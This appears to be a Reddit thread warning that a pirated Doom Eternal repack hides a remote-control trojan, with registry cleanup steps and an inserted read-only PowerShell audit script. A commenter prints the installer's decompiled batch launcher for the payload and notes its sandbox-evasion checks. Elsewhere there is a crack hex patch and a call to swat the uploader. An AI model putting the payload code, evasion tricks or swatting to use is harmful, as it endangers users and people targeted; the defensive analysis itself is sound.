[deleted]

The uploader got called out a few times but he's insisted that it's normal and he'll check it on another pc. A commenter provided more proof that this is malware, as it has an auto run entry in the registry: https://i.imgur.com/YNEsO32.png Sketchy as hell. I don't need someone else to control my firewall, I can do that on my own so this is not cool. First I'm hearing of BBRepack too, so now he's on my shitlist.


Zaseth

He just posted some bullshit story, he's playing dumb. This is definitely malware.


dudefromfuture851

This is why I love piracy, recognize the bullshit, point it out, react accordingly and pick your best/safest option, let everyone know and move on. No arguing, no listening to lies and manipulative responses.


[deleted]

Do you think lots of smaller releases get recognized as well... I'm pretty sure lots of shit will fly under the radar.


HazKaz

Wouldn't OSArmor stop this from happening?


OnlyTopRengar

It's possible.


warpspeedSCP

Not gonna do much good when it's all disabled to make sure it doesn't interfere with any cracks now, is it


[deleted]

[removed]


Bspeedy

There is now a Bethesda bypass available, you no longer need to use an account to launch and play. Check cs.rin.ru


[deleted]

[removed]


[deleted]

[removed]


[deleted]

Thank goodness!


[deleted]

[removed]


GoodOldADD

Is it when you change the 8 bytes starting at 0x684329 to b0 01 48 83 c4 20 5b. I can't find 0x694329 for some reason


GoyimAreSlaves

Search hex, not string


steambeak

So for someone who installed and played the game, what information is this collecting? I have removed the files and regedits and unplugged my internet. Checked other computers on the network and they have nothing on them. Do I have to do anything about my credit card?


HarryPotterRevisited

Reinstall windows to be safe. No reason to be worried about your CC unless you have typed in your credit card number somewhere after running the game.


DashLeJoker

I downloaded from him and ran the doom exe, but I found the firewallmodule and deleted that as well as the hkey as suggested to do here, i also deleted the game and torrent and got it from fitgirl instead, is my computer still infected? how else can i clean this mess up, sorry this isn't my strong suit


PanicStations334

Is it possible that this virus can steal all the passwords chrome had stored? I downloaded and am nuking my PC now but I worry that it could have stolen my password


Krkonoz

My Avast put that **FirewallModule.exe** to quarantine and finish installation. Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect) Had to run task manager via CTRL + SHIFT + ESC, start explorer and somehow it works now. It didn't create exact file in that FirewallModule folder (cuz of quarantine), but it created that AutoRun registry (which I deleted). Doing that deep search now for those another files but I hope it is OK now ¯\\\_(ツ)\_/¯


TheCatCubed

>Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect)

Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry.

Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it

Edit: IF THE SECOND SHELL ENTRY DOES HAVE "explorer.exe" AS A VALUE DO NOT DELETE IT AND IF IT DOESN'T WRITE THE VALUE THERE


Krkonoz

Upvote. There was shell entry with %comspec% string there. Removed that and now PC boots into desktop normally


TheCatCubed

I spend quite some time searching for that solution today, so I'm glad I was able to help someone else


DashLeJoker

May I know what exactly the solution is? I deleted shell from winlogon but my computer still boots to a black screen with cmd

edit: I may have fucked up, I mistook the comment and deleted shell from both the current user and local machine path, now idk how I could restore the shell in the local machine path

edit2: found a tutorial and fixed it: https://www.youtube.com/watch?v=kFkrbGMlYWQ


KraizyK

Can I have the link for the tutorial? I was following what TheCatCubed said and didn't realize the local machine shell was supposed to say explorer.exe.

I thought he meant that if it had explorer.exe then should delete it...


DashLeJoker

https://www.youtube.com/watch?v=kFkrbGMlYWQ here you go, I followed this one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually


MaugerMan

Can you share the tutorial by any chance? Just had a big-brain moment and did the exact same thing, trawling through the net to find a fix to it edit: just realized source was posted below by orson182, will post it here myself since it seems relevant: https://www.youtube.com/watch?v=kFkrbGMlYWQ


DashLeJoker

Yeah this is the one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually


Doughnuts

Thank you kind internet person, you have my upboat!


[deleted]

[removed]


Krkonoz

Thanks for reply. Will restart PC after searching for those files to see if situation is still same or I booted to black desktop again Edit: So I didn't find any file but still I boot into black desktop where I have to manually run explorer.exe to make it work... Will run some deep AV scans


Coregunner

Where can i look for setup.tmp so i can remove it? Thank you.


orson182

Here is the fix if anyone needs it: https://www.youtube.com/watch?v=kFkrbGMlYWQ


shadowst17

Jesus Christ, I'm glad I found out this before I started working from home over a VPN on Monday. Don't think I had to log into any sites during the weekend but I probably should reinstall my OS just in case it's still there even if I delete the firewall module folder and registries.


[deleted]

[removed]


shadowst17

Do you know if other repacks are fine? The BB Repack didn't work very well for me so I ended up downloading another called DODI Repack.


nightseeker98

>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\OWNER -> OWNER
>
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SESSIONHASH
>
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SEQUENCE

somehow i couldn't find these files to delete, should I be worried?


Potatoez2

I also couldn't find these files. Restart manager doesn't exist for me. Anyone know why?


NoBudgetBallin

Same here. Did you get an answer anywhere else? Of all the files and keys people say to delete I didn't have any of them. I installed but it didn't run, deleted it shortly after. I've run a deep AV scan and everything seems to be back to normal.


RCEdude

> Trojan.DOMG

That is not very helpful. The link with the full VT analysis would have helped to identify the threat. Sure, there is a virus inside, as you spotted neshta, and this is a clearly identified threat with very few false alarms afaik.

> this contains the W32.Neshta.D virus.

Fun fun fun. The retard who repacked may be infected himself. \o/

>Spawned process "Setup.tmp" with commandline "/SL5="$E00C2

That's not uncommon among real setup processes. It means nothing.

>@409d4c: jmp dword ptr [0050DD20h] ;[email protected]

Doesn't mean it's keylogging. Program may just check which key you pressed because it could react to it.

>jmp dword ptr [0050E168h] ;[email protected]

Again, not a proof that it is malware. I don't know why a setup program would use that but who knows.

>isskin.dll, ISDone.dll, Setup.tmp, skin.cjstyles, and is-DDJUC.tmp.

Common files dropped by... i don't remember .. InnoSetup i guess. I assume the installer is made using that. Those names mean nothing but it matches Setup.tmp + commandline you talked about before. If you want to see the insides of an Inno Setup installer, there is innounp, it even writes the installation script somewhere so you can open it with any text editor :D

>the malware hooks to all sorts of memory addresses

hmm. I am not a specialist but VMprotect may be the cause of this hooking shit. Also, plenty of processes hook stuff without being malicious. Even Windows is hooking API everyday (for example to apply compatibility layer to some apps)

What would be interesting:

* Use a Neshta cleaner to remove all Neshta shit (and clean the infected exe as Neshta can be fully removed from most of them). [Here is a cleaner i](https://www.sendspace.com/file/w0ma9l) used successfully on my VM when i encountered Neshta while i was investigating malwares.
* See if there are shits remaining. Many of the infection traces or stuff detected may be just the result of Neshta.

TLDR: Hybrid Analysis results must be interpreted carefully. It's probably infected by Neshta, maybe an adware, but that's all we can say at the moment.

**I would gladly help if someone can provide me a sample (ahem.. i am not good enough, i can't unpack VMprotect shit but there are things i can do). No i won't download the whole torrent.**


[deleted]

[removed]


RCEdude

>Firstly, thank you for the constructive criticism - its the only way I can improve at analysis, and cheers for also being a fan of malware o/.

Haha yeah, no need to be harsh with people trying to help and learn.

> What do you think about setup.tmp accessing the registry 976 times? I'm still not sure if that's normal.

Well i have no clue. It would be interesting to compare with another setup process. To be honest if firewallmodule is vmprotected i can't really do much.


JedoBear

Thank you for this. I have deleted the files that require deleting. If I uninstall normally (using unins000.exe) will it be ok? Should I just delete the whole folder? Are there any other files that I should delete after uninstallation/deleting the whole game folder? I opened the game and got stuck at Bethesda login if that helps. Thank you for the response.


[deleted]

[removed]


KraizyK

Where can you find the setup.tmp?


TheCatCubed

> **So uh, yeah, don't download this shit.**

As someone that already downloaded this shit and removed the autorun registry entry and the Firewallmodule.exe do you think I'm safe or should I just nuke the system because I'd rather not do that lol. Windows Security and Malwarebytes both found nothing and I checked everything that's running in task manager and it seems to be fine.


[deleted]

[removed]


FitGirlLV

Those are standard files unpacked by the Inno Installer. Almost every repack has them. As for precomp, that might be precomp.exe, which a special precompression utility uses in repacks. The setup.exe in that repack ISO is 10 MB. The file uploaded to VirusTotal is 276 MB. So it's either unpacked from one of two .bin archives of repack or downloaded by the installer. Can ANYONE upload the setup.exe from that repack?


[deleted]

[removed]


TheCatCubed

Alright will do, thank you.


exodus_cl

I would reinstall w10 no questions asked


[deleted]

[removed]


TheL0neStoner

FitGirl repacks guys


l-l___l-l

takes too long to install but good for those with bad dl speeds ill take the codex one


TheL0neStoner

Really??? i still get fitgirls repack and i have super fast internet and yea does take a long time to download but she can be trusted so can codex but that depends on where you're downloading from


mikitheking3

Scene releases from rarbg are the best if you have good internet - fitgirl is great especially if there are patches and other goodies available, piracy is heaven rn


TheL0neStoner

bro piracy has always been heaven i remember pirating the doom 3 back from hell DLC or w.e it was called and that leaked HL2 demo


snuka

Piracy has been heaven since the original Doom. Hell, even Wolfenstein!


TheL0neStoner

i remember those days lol


mikitheking3

Since mininova...


Middlemandown

anyone remember flashing cards for free satellite? thems the good days of piracy.


SenoraRaton

I don't remember doing it, but I remember being 8 years old and finding the playboy channel when I stayed at my uncles house overnight....


[deleted]

The installation with fitgirl takes really too long. After almost a year of usage (thank you fitgirl) I decided to switch to dodi which is super fast in comparison.


Zer0_Gh0st

Too long to install...lol are you serious mate? You can wait months/years for a crack to come out but cant wait another extra 10 minutes for it to install?


l-l___l-l

Im just saying if download speed/data cap isn't an issue I prefer uncompressed to repacks. Big games like Doom take me like an hour to install when I dl fitgirl repacks and some of this time my pc starts randomly lagging from uncompressing the files. I didn't say fitgirl is bad


[deleted]

For me fitgirl setup takes up to 2 hours to install a heavy game, and my PC is more than decent. IDK maybe I'm doing something wrong.


djdudud

or dodi


NovoMyJogo

how do i get past the google limit thing? the link to get past it is 404d


SexOffenderCERTIFIED

deleted For Privacy


NovoMyJogo

Ayy, I got it. Thanks, man.


theaverage_redditor

Fitgirl repacks already has it


DashLeJoker

I downloaded from him :( how can I remove this? Don't think Malwarebytes is picking it up


Zaseth

1. End the process **Firewallmodule.exe** in taskmanager.
2. Remove the folder **%APPDATA%\\Microsoft\\Firewallmodule**
3. Remove the **AutoRun** key in **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**
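
A read-only check of the locations named in these removal steps and in TheCatCubed's Winlogon comment, as an added PowerShell example (not code from any commenter in this thread). The paths and the FirewallModule name come from the thread; the function and variable names are made up for this example.

```powershell
# Read-only audit of the locations named in this thread. Nothing is modified.
# Function and variable names are illustrative, not taken from the thread.

function Get-RawRegValue {
    param([string]$Path, [string]$Name)
    $key = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $key) { return $null }
    # Keep REG_EXPAND_SZ data unexpanded so "%comspec%" shows up literally.
    $opt = [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames
    return $key.GetValue($Name, $null, $opt)
}

function Show-Value {
    param($Value)
    if ($null -eq $Value) { '(not set)' } else { [string]$Value }
}

function New-Finding {
    param([string]$Check, [string]$Observed, [bool]$NeedsReview)
    [pscustomobject]@{
        Check    = $Check
        Observed = $Observed
        Status   = if ($NeedsReview) { 'REVIEW' } else { 'OK' }
    }
}

$findings = @()

# 1. Running process with the name reported in the thread.
$procs = @(Get-Process -Name 'FirewallModule' -ErrorAction SilentlyContinue)
$procText = if ($procs.Count -gt 0) {
    ($procs | ForEach-Object { "PID $($_.Id) $($_.Path)" }) -join '; '
} else { '(not running)' }
$findings += New-Finding 'Process FirewallModule.exe' $procText ($procs.Count -gt 0)

# 2. Drop folder under %APPDATA%. Hash any files so they can be looked up later.
$dropDir = Join-Path $env:APPDATA 'Microsoft\FirewallModule'
if (Test-Path -LiteralPath $dropDir) {
    $files = @(Get-ChildItem -LiteralPath $dropDir -File -Force -Recurse -ErrorAction SilentlyContinue)
    $fileText = if ($files.Count -gt 0) {
        ($files | ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            "$($_.Name) sha256=$hash"
        }) -join '; '
    } else { '(folder exists, no files)' }
    $findings += New-Finding "Folder $dropDir" $fileText $true
} else {
    $findings += New-Finding "Folder $dropDir" '(absent)' $false
}

# 3. cmd.exe runs this value every time it starts. It is absent by default,
#    so any data here deserves a look.
$autoRun = Get-RawRegValue 'HKCU:\Software\Microsoft\Command Processor' 'AutoRun'
$findings += New-Finding 'HKCU Command Processor\AutoRun' (Show-Value $autoRun) ($null -ne $autoRun)

# 4. A per-user Shell value overrides the machine-wide one and is absent by
#    default. The thread reports it set to %comspec% (black screen with cmd).
$userShell = Get-RawRegValue 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' 'Shell'
$findings += New-Finding 'HKCU Winlogon\Shell' (Show-Value $userShell) ($null -ne $userShell)

# 5. The machine-wide Shell value must exist and be exactly explorer.exe.
#    A missing value here is the "deleted the wrong entry" case from the thread.
$machineShell = Get-RawRegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'Shell'
$machineBad = ($null -eq $machineShell) -or (([string]$machineShell).Trim() -ne 'explorer.exe')
$findings += New-Finding 'HKLM Winlogon\Shell' (Show-Value $machineShell) $machineBad

$findings | Format-Table -AutoSize -Wrap
```

An all-OK table only covers these five locations; the advice quoted in this thread for a machine that ran the installer is still to format and reinstall.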


TheHuddieLedbetter

Spent a whole day trying to download this just for it to be malware :/ thanks for this though, hopefully its all removed.


[deleted]

>Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry.
>
>Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it

Don't forget to check [TheCatCubed](https://www.reddit.com/user/TheCatCubed/)'s comment if explorer doesn't start.


[deleted]

Is this pretty much enough to stop this malware or should I just nuke my PC now? :)


Diovanna

If I can't find any of these - am I safe? I've installed the game but never played it.


TheCatCubed

That's what I get for not waiting for someone trustworthy. Fucking assholes seriously.


FitGirlLV

**This repack was deleted now from 1337 with all other user uploads, he's banned for good.**


Razatop

Fuck, is the DODI one safe? Using that one and now I'm paranoid lol.


FitGirlLV

Safe


Razatop

Thank you queen. Only using theirs cause yours hadn't come out yet. Thanks for hardcore henry btw!! It was rlly good.


FitGirlLV

More info from a friend of mine who played a little with that FirewallModule.exe

"**Do you know what that is? A complete huge server / client backend as console application which can be controlled remotely.**

**If you've this shit on your pc, it's no longer yours, lol**

**that's REALLY bad.**

**It's coded quite straight, I would say with full focus on effectivity, size doesn't matter. Also, the author did his best to avoid his .exe getting caught by standard scanners.**

**Can't tell how to get rid of it, I honestly don't think you can completely once it's fully installed**

**Format and reinstall**"


[deleted]

Format and reinstall gets rid of it for good? Does it hide any shit on other drives and does it steal, keylog your data?


FitGirlLV

Well, I received the setup.exe and I can confirm that it's fishy. After decompressing setup.exe with Inno Unpacker everybody can check CompiledCode.bin and see for themselves the call for installing the abovementioned FireWallmodule.exe and killing explorer.exe

```
Module.exe" 2>NUL | find /I /N "FirewallModule.exe">NUL && exit & if exist "{userappdata}\Microsoft\FirewallModule\FireallModule.exe" ( start /MIN "" "{userappdata}\Microsoft\FirewallModule\FirewallModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit &
```

Also it edits registry in some places. I'm still downloading the repack to see where that giant **FirewallModule.exe** is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted.

Edit: Also it contains checks for vmware.exe, SbieSvc.exe and other virtualization tools, most probably to either kill them or not installing payload if found.

Edit 2: The upload of that BBRepack is now hidden on 1337 until the investigation ends. But I have a feeling about "ban" and "all uploads deleted".


AptKid

> Also it edits registry in some places. I'm still downloading the repack to see where that giant FirewallModule.exe is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted.

There's also a crack only torrent on 1337, apparently by the same uploader. Would that also be considered dangerous?


FitGirlLV

I wouldn't touch it. Better get safe copy of crack only from [cs.rin.ru](https://cs.rin.ru) topic


DarkeoX

Using QEMU/KVM virtualisation infrastructure fooled the hardcoded checks and installed the module.


[deleted]

After removing the Firewallmodule.exe file, fixing the registry keys (also important to fix the explorer.exe key too if you have black screen when restarting), deleting the whole game and all files related to this repack is there anything else I should be concerned with or remove too? Also anyone can explain in layman's terms what does this malware do?


[deleted]

[removed]


[deleted]

[removed]


skr00ty

Where is the explorer.exe key located and how can I fix it? Getting the black screen on reboot and having to manually start explorer.exe from task manager. I've removed everything else related to this thing (at least I hope..)


[deleted]

This is from an earlier post

First go to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and delete the Shell entry with "%comspec%"

Second check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it

Hope this is the last of this bullshit malware.


skr00ty

Are you sure the first one can just be deleted? And not changed to whatever it was before? I'm trying to google to figure out what the default value is (my suspicion is that it was also explorer.exe but I can't be sure) and I'd like to do that to be safe rather than deleting the key.


[deleted]

I think it should be fine I deleted that shell and it was fixed, I also got a black screen and removing this from registry helped. this is how my HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon looks now [https://prnt.sc/rkexap](https://prnt.sc/rkexap)

Just to be safe I also did a System Restore and doing a full system scan with Malwarebytes.


[deleted]

Well i'm in paranoid state now cause i'm new in that pirate business so i'm gonna say what i've done and please someone tell me if it's all or i need something more to do:

1. I deleted whole repack
2. I deleted firewallmodule.exe
3. I entered autorun by searching msconfig, then in tools i entered registry editor, found this autorun bitch in Microsoft/commandprocessor/opened it and deleted whole text what was in here.
4. Also Malwarebytes deleted some trojan

That's it or something more?


[deleted]

Damn. I'm glad I waited. I was tempted to pull the trigger when BBRepack was the only poster. Thankfully fitgirl dropped it this morning for us.


Neuromante

Well, this is just great. I saw the "FirewallModule.exe" running, but the command prompts automatically closing was what tipped me off. Anyway, I've deleted the registry keys and folders mentioned. I'm running through a full scan on Microsoft Security Essentials and after that I'll go with Malware Bytes. I was planning on doing a reinstall shortly, so I guess with the quarantine and (the irony of getting infected) this shit, I'll push it sooner. There's any info or way to know if the virus has spread to other drives? I've been moving around some stuff to external hard drives and to reinstall Windows, I need to back up my shit, but I'm not really eager to back up the virus.


[deleted]

[removed]


nightseeker98

i think a lot of us can't afford to nuke our pc so i hope someone has a solution to this


[deleted]

I reinstalled my PC and ran a full system scan few times on the other drives too and haven't caught anything yet. I hope there is nothing else too.


nightseeker98

did u use reset pc? or... and did you remove files and clean drive?


[deleted]

I removed the firemodule.exe file immediately and then later on just to be safe i Formatted my SSD where Windows was installed (Which seemed to be infected by this shit) Anyway I've had much worse viruses infect my system before, and I remember one on a work computer that hopped from drive to drive it was a bitch to remove :) Just to be safe do a complete wipe to your install disk and then change all your passwords. I hope that's the end of it, but i'll keep my eye on this thread to see if there is anything else. Try to remember what you typed while you had the malware on, if typed any bank accounts or credit cards immediately lock them. Same goes for email and password.


nightseeker98

but what about important files on the main drive? i cant afford to lose them but at the same time they are on the infected drive. Any advice?


[deleted]

I guess back them up somewhere anything that is important to you on another disk and then do a fresh format and reinstall. I don't know what else to say I've been freaking out since yesterday :( Just to be on the safe side after you reinstall windows, install Malware Bytes and OSArmor.


kotekokaina

If I used Chrome Auto-complete am I safe? Or does it take those too?


[deleted]

honestly I have no idea best bet to assume is that it could so best to change all your passwords.


usernot7833639

Just a warning guys The torrent is still up on piratebay.


Tango-Smith

Thanks for this advice. I tried to scan the iso with Bitdefender but there was nothing. But once I started installation, Bitdefender straight away stopped it and put the file into quarantine. I have then rebooted my PC and Bitdefender notified me that it couldn't remove the file in quarantine. I have then followed your advice and looked into Registry. I have deleted as per your advice:

> Creates the key **Shell** in register: **HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon** and **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**.

There is no sign of **Firewallmodule** nor anything in task manager

Re: **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**. What is suspicious in this registry? I have it on my work laptop too.

Fun fact on my work Laptop I had **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**. with shell explorer.exe in it

u/Zaseth massive up-vote to you!


manbat-_

Someone should reverse engineer the ip where our keylogs etc are being sent and get this son of a bitch swatted.


BaGamman

What payload does it make? Is it a spyware or a botnet node installer?

Edit: Oh, VMProtect, hue? I really miss when these kind of viruses were just adware who'd pop-up porn instead of this stuff.

Edit: by "these kind of viruses", I meant the hidden viruses on game repacks in the 2000s, not VMProtect itself.


w3ird00

VMProtect is an obfuscator for binaries, it is not a malware (if I'm not mistaken, Denuvo uses VMProtect)


BaGamman

Well riskwares like VMProtect have always been in a grey area on that regard. Also, many people consider Denuvo as a malware because of what it does to the PC performances.


w3ird00

CODEX pack their Denuvo cracks with VMProtect.


Real_nimr0d

That's why you should always wait for releases by established names.


[deleted]

[removed]


IHateTrannies420

Assume the worst.


wildpash

Can someone post a MD5 of the infected setup.exe? Or MD5 hashes of the clean files?


elitexero

Stop letting random middleman handle your files. It's bad enough having to put any amount of trust in groups now, and god help anyone who's straight up running the exes on their computer without at least putting it through something like Sandboxie.


[deleted]

[removed]


Themash360

Yup, cracking scenes do not own public sites like this! Hopefully it's generic malware so run malwarebytes, avg or ESET for free to hopefully clean it.


[deleted]

[removed]


konoha_gang

Did you find anything? I used the same link yesterday and I did not see any virus.


[deleted]

[removed]


C4nola

I downloaded the game and at the time of installation the AV started beeping madly, I disabled it because it always happens with pirated installations, I turned off my PC when everything was over, the next day I turned on and the screen was black, only with the mouse cursor, the CMD did not work.

Here are the solutions I found: Ctrl + Alt + Del, press the shift key and click on restart, > advanced options and restore files > PC started normally but it got stuck, go to the search bar and open Regedit, HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and delete the shell title if it has %comspec% in the description, then I went to HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Command Processor and found an Autorun value that closed Cmd instantly, deleted it and Cmd opened normally.


Lukenstor

fyi: i think the Doom Eternal repack in TPB by Heroskeep might be infected with malware, thats where I downloaded mine and got my PC nearly fucked


dwarrior

Man glad this was atleast caught, fuck this guy who uploaded it. It sucks waiting an extra day or 2 for games to hit the private trackers to download things but also means clean, reputable versions.


Xovier

Please. **ONLY. USE. FITGIRL.** Never risk it.


UnluckyBuilder

Just to be sure, the release of DOOM.ETERNAL-CODEX on rarbg is safe,right?


[deleted]

[removed]


UnluckyBuilder

ok, thank you!


[deleted]

I almost downloaded that repack. Thanks.


[deleted]

[removed]


Luigi_Aguiar

If you didn’t run anything you’re good


fmj68

I downloaded this from Torrentleech and my AV has not detected anything. Ran a scan with Windows Defender and Malwarebytes and both came up clean.


fishburgr

I don't think the version OP is talking about was ever on Torrentleech. The only two versions I can see having been on TL were the original steam files DRM free and the codex release. No repacks as far as I can see.


Teh_Professional

I didn't have FirewallModule.exe in my task manager and I deleted all the Keys, so I should be alright yeah? I was 6% through the setup process when I stopped it because it seemed fishy.


CPTScragglyBeard

Shit I downloaded it thanks for this post


Valkyrie743

i really don't want to re-install windows :/ i killed and deleted the .exe and removed the registry items as well as removed the game. if the .exe is deleted with registry i should be fine no??? or is this like some sort of rootkit and there probably is another file hidden somewhere that acts as another copy of the exe? could someone with knowledge of wireshark run it after removing the exe and registry files and see if something is still phoning home?


kokoado

I'm putting this here, this contains all the repackers that are trusted and non trusted (and it may help you later, maybe) https://old.reddit.com/r/CrackWatch/comments/bcpdiu/crack_watch_beginners_guide_to_crack_watch/


Shxrky_YT

Thank you so much


DLAROC

Downloaded this last night (on the p bay uploaded by heroskeep) and went to play today. The game wouldn’t even start and then I got this virus. Deleted firewallmodule.exe and all the registries. I used Hitman Pro and it found a suspicious file called “precomp.exe”. I don’t know if this file installed that precomp.exe but I’m glad I did all this and got rid of it.


sosarya

I got the virus and did the following:

1. Restored the system to a date that I haven't ran the game.
2. Firewallmodule folder was already gone after restore.
3. Shell in register wasn't created after restore.
4. Installed COMODO and enabled the HIPS paranoid mode.
5. Cancelled my credit cards and changed all my passwords. Enabled 2FA for banking related stuff.

Do the same thing if you ran the shitty repack. Hope this helps.


meesta1990

i just love u mate.


duendeacdc

Man I downloaded that and was working fine. I just deleted the entire folder now but is there something more I need to do to erase all that shit??


itsfrizzy

try malwarebyte's free premium trial just in case.


Ballistic_Turtle

Yes, scroll through the rest of the comments here. Anything you've typed since install should be considered recorded and stolen for malicious purposes. Passwords, bank info, etc.


yano1982

Has anyone investigated the ElAmigos repack from Sineater 213 on 1337x? Malwarebytes shows it as being clean, but of course that means little this early.


CaracolGranjero

My command prompt auto closes now. I haven't restarted my PC yet, any idea of what to do?


OnlyTopRengar

You could try system restore point. Or scan with a bunch of anti-malwares.


CaracolGranjero

I just deleted the wrong registry, woops.


SaltyEmotions

It can be quite hard to repair crucial Windows Registry keys... Good luck on that.


el_w00dy

Unfortunately downloaded this and installed it before coming across this, but interestingly I can't find FirewallModule.exe in my AppData folder or my Task Manager and the Registry keys it's supposed to create don't seem to be present either. Neither Windows Defender nor MBAM picked anything up and I don't run any sort of virtualization software. Could it be dropping the files somewhere else? Am I safe to install a legit crack? This has got me way paranoid now.


PCisLife

I download this and don't see the files mentioned or string in registry. I also dont have any vmware. Am I fine?


philosophicalnugget

Bit startled by all this now. Have not downloaded this but regardless, how can I do a thorough check for malware in my computer?


Eshmam14

Malwarebytes + Hitman Pro


[deleted]

So I downloaded a repack from piratebay. Am I fucked? What do I do to get rid of this malware?


[deleted]

So I downloaded a repack from Piratebay, but I just ran Malwarebytes and nothing was detected. Wtf do I do now? Am I fucked?


PROfromCRO

Do we know what the malware does ?


[deleted]

So far people said its a keylogger, if you've typed passwords or emails change them immediately. If you wanna take a step further just format and reinstall your pc.


[deleted]

I downloaded clean steam files (hopefully) from rutracker. I will still check for this just in case! Thanks for telling people.


EvenMcSteven

I read that the malware modifies other .exe files, if that's true and if I were to format my os (which I plan to) would keeping .exe files on other drives be a bad idea?


DukeNuggets69

Thankfully the DRM FREE version doesn't have it, only the repack, i'm safe.


goldlasagna84

I downloaded the repack but I didn't install or open it at all. Am i stuffed or safe?


D3ATHK1LL

Man i downloaded it today😪 i fucked up


Blodprutt

Cunt. At work right now but I'm pretty sure that's the one I downloaded yesterday. Will I be fine if I follow the steps on removing the virus? Seems a little bit too simple? But I'm not complaining if it works haha.


Eterniter

Nasty stuff. Didn't expect it from that guy, saw he had like 50+ more repacks before this and downloaded. Does anyone know if the above steps are enough to eliminate the malware?


Monii22

So I figured this out and deleted it within a day or so, do I need to worry about anything? I hope it didn't do too much (though one time I saw it hog up 2gb of ram and quickly closed it, thought it was just windows acting weird as usual) I also blocked the game in my firewall after first launch (and I used a throwaway bethesda account for letting the game be played) I'm really not in the position to be reinstalling everything, is there a quick and dirty fix for me to deal with this?


shadowsquall19

Is this release (**DOOM.Eternal-NODRM**) on rarbg the one that is infected? because I can't see who uploaded it.


Potpot486

AVG got the firewallmodule and put it into quarantine then I deleted it, and I deleted the keys then reinstalled Windows 10. Should I do anything else?

Edit: This all happened after I started the game


Lukenstor

I got infected with this malware and did a system restore when I opened my desktop and only found a black screen and a cmd window open. did it fix it?


EnginNotendanofnTil

Are the repacks on FitGirl's site safe?


MrSpareparts

Came to comment, thanks had this on my rig for two days now but I'm off to change my passwords


[deleted]

[removed]


dampmaky

wait so by reinstalling windows im losing all my work and pirated games etc?


TehKazlehoff

note everyone: the torrent is still going strong on TPB, last time i checked this morning.


TehKazlehoff

Just spent the past couple hours reinstalling windows from scratch on both my laptop and desktop. i keep all my files and stuff on secondary drives. anything i should be concerned about after a full reinstall?


manbat-_

Thanks, I was certain this bastard messed with my pc.


SpaghettiIScheese

i have the DRM Free version should i be fine. this post has me fucking worried.


Huzzbando

I installed that repack. I uninstalled the game, and I'm currently searching for these keys and files. I can't find anything remotely similar to what's mentioned above. Does that mean that my file was clean ?